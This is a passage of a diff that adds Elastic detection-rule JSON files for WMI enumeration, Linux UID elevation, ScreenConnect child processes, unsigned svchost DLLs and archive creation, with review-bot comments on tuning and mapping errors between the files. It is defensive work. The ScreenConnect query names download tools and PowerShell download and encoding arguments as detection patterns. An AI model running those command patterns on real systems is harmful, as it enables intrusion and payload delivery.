"770e0c4d-b998-41e5-a62e-c7901fd7f470", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/" + }, + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/", + "subtechnique": [ + { + "id": "T1016.001", + "name": "Internet Connection Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/001/" + } + ] + }, + { + "id": "T1057", + "name": "Process Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "770e0c4d-b998-41e5-a62e-c7901fd7f470_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_111.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_111.json new file mode 100644 index 00000000000..ec5ccc9e0a9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_111.json 
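Review bot: The exclusions `not (process.name : "sc.exe" and process.args : "RemoteRegistry" ...)` and `not process.args : "tenable_mw_scan"` in `query` are undocumented allowlists, and the same query is carried unchanged into the _111 file that follows. EQL accepts `/* ... */` comments inside the query string, so a one-line rationale such as `/* RemoteRegistry start-type tuning and the tenable_mw_scan argument are known benign WMI children — see <ticket placeholder> */` would let a maintainer judge whether the exemptions still hold (the tenable entry presumably refers to a Tenable scanner plugin; confirm before recording it). The only difference visible between the _110 and _111 bodies is the endpoint index pattern (`logs-endpoint.events.*` versus `logs-endpoint.events.process-*`), which is worth stating wherever the package records rule changes.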
@@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies native Windows host and network enumeration commands spawned by the Windows Management Instrumentation Provider Service (WMIPrvSE).", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration Command Spawned via WMIPrvSE", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.command_line != null and \n process.name:\n (\n \"arp.exe\",\n \"dsquery.exe\",\n \"dsget.exe\",\n \"gpresult.exe\",\n \"hostname.exe\",\n \"ipconfig.exe\",\n \"nbtstat.exe\",\n \"net.exe\",\n \"net1.exe\",\n \"netsh.exe\",\n \"netstat.exe\",\n \"nltest.exe\",\n \"ping.exe\",\n \"qprocess.exe\",\n \"quser.exe\",\n \"qwinsta.exe\",\n \"reg.exe\",\n \"sc.exe\",\n \"systeminfo.exe\",\n \"tasklist.exe\",\n \"tracert.exe\",\n \"whoami.exe\"\n ) and\n process.parent.name:\"wmiprvse.exe\" and \n not (\n process.name : \"sc.exe\" and process.args : \"RemoteRegistry\" and process.args : \"start=\" and \n process.args : (\"demand\", \"disabled\")\n ) and\n not process.args : \"tenable_mw_scan\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": 
"770e0c4d-b998-41e5-a62e-c7901fd7f470", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/" + }, + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/", + "subtechnique": [ + { + "id": "T1016.001", + "name": "Internet Connection Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/001/" + } + ] + }, + { + "id": "T1057", + "name": "Process Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "770e0c4d-b998-41e5-a62e-c7901fd7f470_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_2.json b/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_2.json new file mode 100644 index 00000000000..5223e382518 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_2.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the elevation of regular user permissions to root permissions through a previously unknown executable. Attackers may attempt to evade detection by hijacking the execution flow and hooking certain functions/syscalls through a rootkit in order to provide easy access to root via a special modified command.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "UID Elevation from Previously Unknown Executable", + "new_terms_fields": [ + "host.id", + "process.executable", + "process.command_line" + ], + "query": "host.os.type:\"linux\" and event.category:\"process\" and event.action:\"uid_change\" and event.type:\"change\" and user.id:\"0\"\nand process.parent.name:(\"bash\" or \"dash\" or \"sh\" or \"tcsh\" or \"csh\" or \"zsh\" or \"ksh\" or \"fish\") and not (\n process.executable:(\n /bin/* or /usr/bin/* or /sbin/* or /usr/sbin/* or /snap/* or /tmp/newroot/* or /var/lib/docker/* or /usr/local/*\n ) or\n process.name:(\n \"bash\" or \"dash\" or \"sh\" or \"tcsh\" or \"csh\" or \"zsh\" or \"ksh\" or \"fish\" or \"sudo\" or \"su\" or \"apt\" or \"apt-get\" or\n \"aptitude\" or \"squid\" or \"snap\" or \"fusermount\" or \"pkexec\" or \"umount\" or \"master\" or \"omsbaseline\" or \"dzdo\" or\n \"sandfly\" or \"logrotate\"\n ) or\n process.args:/usr/bin/python*\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7787362c-90ff-4b1a-b313-8808b1020e64", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.013", + "name": "KernelCallbackTable", + "reference": "https://attack.mitre.org/techniques/T1574/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "7787362c-90ff-4b1a-b313-8808b1020e64_2", + "type": "security-rule" +} \ No newline at end of file 
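Review bot: The `threat` mapping attaches subtechnique `T1574.013` (KernelCallbackTable) to this Linux rule, but that subtechnique describes a Windows user-mode hooking technique and is listed by MITRE for the Windows platform only, so it does not fit rootkit-style hooking on Linux; mapping to `T1574` alone, alongside the existing `T1014` entry under Defense Evasion, would be accurate. Separately, the `query` exempts broad locations (`/usr/local/*`, `/tmp/newroot/*`, `/var/lib/docker/*`) and any `process.args:/usr/bin/python*` without recording why; KQL has no comment syntax, so a short "Known benign paths" paragraph in a `note` field (this rule has none) would give the tuning a home. The `setup` text also links `fleet/8.10/agent-policy.html` while every other link uses `current`, which will go stale.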
diff --git a/packages/security_detection_engine/kibana/security_rule/78de1aeb-5225-4067-b8cc-f4a1de8a8546_1.json b/packages/security_detection_engine/kibana/security_rule/78de1aeb-5225-4067-b8cc-f4a1de8a8546_1.json new file mode 100644 index 00000000000..9ed532502bb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/78de1aeb-5225-4067-b8cc-f4a1de8a8546_1.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the ScreenConnect client processes. This activity may indicate execution abusing unauthorized access to the ScreenConnect remote access software.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "logs-system.security*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious ScreenConnect Client Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name :\n (\"ScreenConnect.ClientService.exe\",\n \"ScreenConnect.WindowsClient.exe\",\n \"ScreenConnect.WindowsBackstageShell.exe\",\n \"ScreenConnect.WindowsFileManager.exe\") and\n (\n (process.name : \"powershell.exe\" and\n process.args : (\"-enc\", \"-ec\", \"-e\", \"*downloadstring*\", \"*Reflection.Assembly*\", \"*http*\")) or\n (process.name : \"cmd.exe\" and process.args : \"/c\") or\n (process.name : \"net.exe\" and process.args : \"/add\") or\n (process.name : \"schtasks.exe\" and process.args : (\"/create\", \"-create\")) or\n (process.name : \"sc.exe\" and process.args : \"create\") or\n (process.name : \"rundll32.exe\" and not process.args : \"url.dll,FileProtocolHandler\") or\n (process.name : \"msiexec.exe\" and process.args : (\"/i\", \"-i\") and\n process.args : (\"/q\", \"/quiet\", \"/qn\", \"-q\", \"-quiet\", \"-qn\", \"-Q+\")) or\n process.name : (\"mshta.exe\", \"certutil.exe\", \"bistadmin.exe\", \"certreq.exe\", \"wscript.exe\", \"cscript.exe\", \"curl.exe\", \n \"ssh.exe\", \"scp.exe\", \"wevtutil.exe\", \"wget.exe\", \"wmic.exe\")\n )\n", + "references": [ + "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": 
"windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "78de1aeb-5225-4067-b8cc-f4a1de8a8546", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Software", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "78de1aeb-5225-4067-b8cc-f4a1de8a8546_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_6.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_6.json new file mode 100644 index 00000000000..9100842170e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_6.json 
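Review bot: The `process.name` list in `query` contains `"bistadmin.exe"`, which matches nothing; the Windows binary is `bitsadmin.exe`, so that entry never fires and should read `\"bitsadmin.exe\"`. The rule also carries the tag `Resources: Investigation Guide` but, unlike 76fd43b7-3480-4dd9-8ad7-8bd36bfad92f above, has no `note` attribute, so the tag advertises guidance that is not present — either add a triage `note` or drop the tag. The `rundll32.exe` branch alerts on every invocation except `url.dll,FileProtocolHandler`; an inline `/* ... */` comment stating why that one handler is exempt would help whoever tunes this rule later.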
@@ -0,0 +1,144 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unsigned library created in the last 5 minutes and subsequently loaded by a shared windows service (svchost). Adversaries may use this technique to maintain persistence or run with System privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unsigned DLL Loaded by Svchost", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n 
\"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "related_integrations": [ + { + "package": "endpoint", + 
"version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "78ef0c95-9dc2-40ac-a8da-5deb6293a14e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": 
"T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "78ef0c95-9dc2-40ac-a8da-5deb6293a14e_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_2.json b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_2.json new file mode 100644 index 00000000000..36c82ad0572 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_2.json 
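Review bot: `"?:\\Windows\\security\\*"` appears twice in the `dll.path` list in `query` (once early in the list and again just before `schemas`); the duplicate is harmless to EQL but shows the list is not being deduplicated and should be removed. The five `dll.hash.sha256` exclusions form an allowlist with no record of which DLLs they correspond to; the query already uses `/* */` comments, so a per-hash annotation such as `/* <vendor/product — DLL name, placeholder> */` would let reviewers verify each exemption and notice when one should be retired. A hash allowlist also silently stops covering those files after any vendor update, so documenting the source makes that drift visible.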
@@ -0,0 +1,158 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects files being compressed or archived into common formats. This is a common technique used to obfuscate files to evade detection or to staging data for exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 1000, + "name": "File Compressed or Archived into Common Format", + "query": "file where event.type in (\"creation\", \"change\") and process.executable != null and not user.id : \"S-1-5-18\" and\n file.Ext.header_bytes : (\n /* compression formats */\n \"1F9D*\", /* tar zip, tar.z (Lempel-Ziv-Welch algorithm) */\n \"1FA0*\", /* tar zip, tar.z (LZH algorithm) */\n \"425A68*\", /* Bzip2 */\n \"524E4301*\", /* Rob Northen Compression */\n \"524E4302*\", /* Rob Northen Compression */\n \"4C5A4950*\", /* LZIP */\n \"504B0*\", /* ZIP */\n \"526172211A07*\", /* RAR compressed */\n \"44434D0150413330*\", /* Windows Update Binary Delta Compression file */\n \"50413330*\", /* Windows Update Binary Delta Compression file */\n \"377ABCAF271C*\", /* 7-Zip */\n \"1F8B*\", /* GZIP */\n \"FD377A585A00*\", /* XZ, tar.xz */\n \"7801*\",\t /* zlib: No Compression (no preset dictionary) */\n \"785E*\",\t /* zlib: Best speed (no preset dictionary) */\n \"789C*\",\t /* zlib: Default Compression (no preset dictionary) */\n \"78DA*\", \t /* zlib: Best Compression (no preset dictionary) */\n \"7820*\",\t /* zlib: No Compression (with preset dictionary) */\n \"787D*\",\t /* zlib: Best speed (with preset dictionary) */\n \"78BB*\",\t /* zlib: Default Compression (with preset dictionary) */\n \"78F9*\",\t /* zlib: Best Compression (with preset dictionary) */\n \"62767832*\", /* LZFSE */\n \"28B52FFD*\", /* Zstandard, zst */\n \"5253564B44415441*\", /* QuickZip rs compressed archive */\n \"2A2A4143452A2A*\", /* ACE */\n\n /* archive formats */\n \"2D686C302D*\", /* 
lzh */\n \"2D686C352D*\", /* lzh */\n \"303730373037*\", /* cpio */\n \"78617221*\", /* xar */\n \"4F4152*\", /* oar */\n \"49536328*\" /* cab archive */\n ) and\n not (\n (\n process.name : \"firefox.exe\" and\n process.code_signature.subject_name : \"Mozilla Corporation\" and process.code_signature.trusted == true\n ) or\n (\n process.name : \"wazuh-agent.exe\" and\n process.code_signature.subject_name : \"Wazuh, Inc\" and process.code_signature.trusted == true and\n file.name : (\"ossec-*.log.gz\", \"tmp-entry.gz\", \"tmp-entry\", \"last-entry.gz\")\n ) or\n (\n process.name : \"excel.exe\" and\n process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true and\n file.extension : (\"tmp\", \"xlsx\", \"gz\", \"xlsb\", \"xar\", \"xslm\")\n ) or\n (\n process.name : \"Dropbox.exe\" and\n process.code_signature.subject_name : \"Dropbox, Inc\" and process.code_signature.trusted == true and\n file.name : \"store.bin\"\n ) or\n (\n process.name : \"DellSupportAssistRemedationService.exe\" and\n process.code_signature.subject_name : \"Dell Inc\" and process.code_signature.trusted == true and\n file.extension : \"manifest\"\n )\n )\n", + "references": [ + "https://en.wikipedia.org/wiki/List_of_file_signatures" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, 
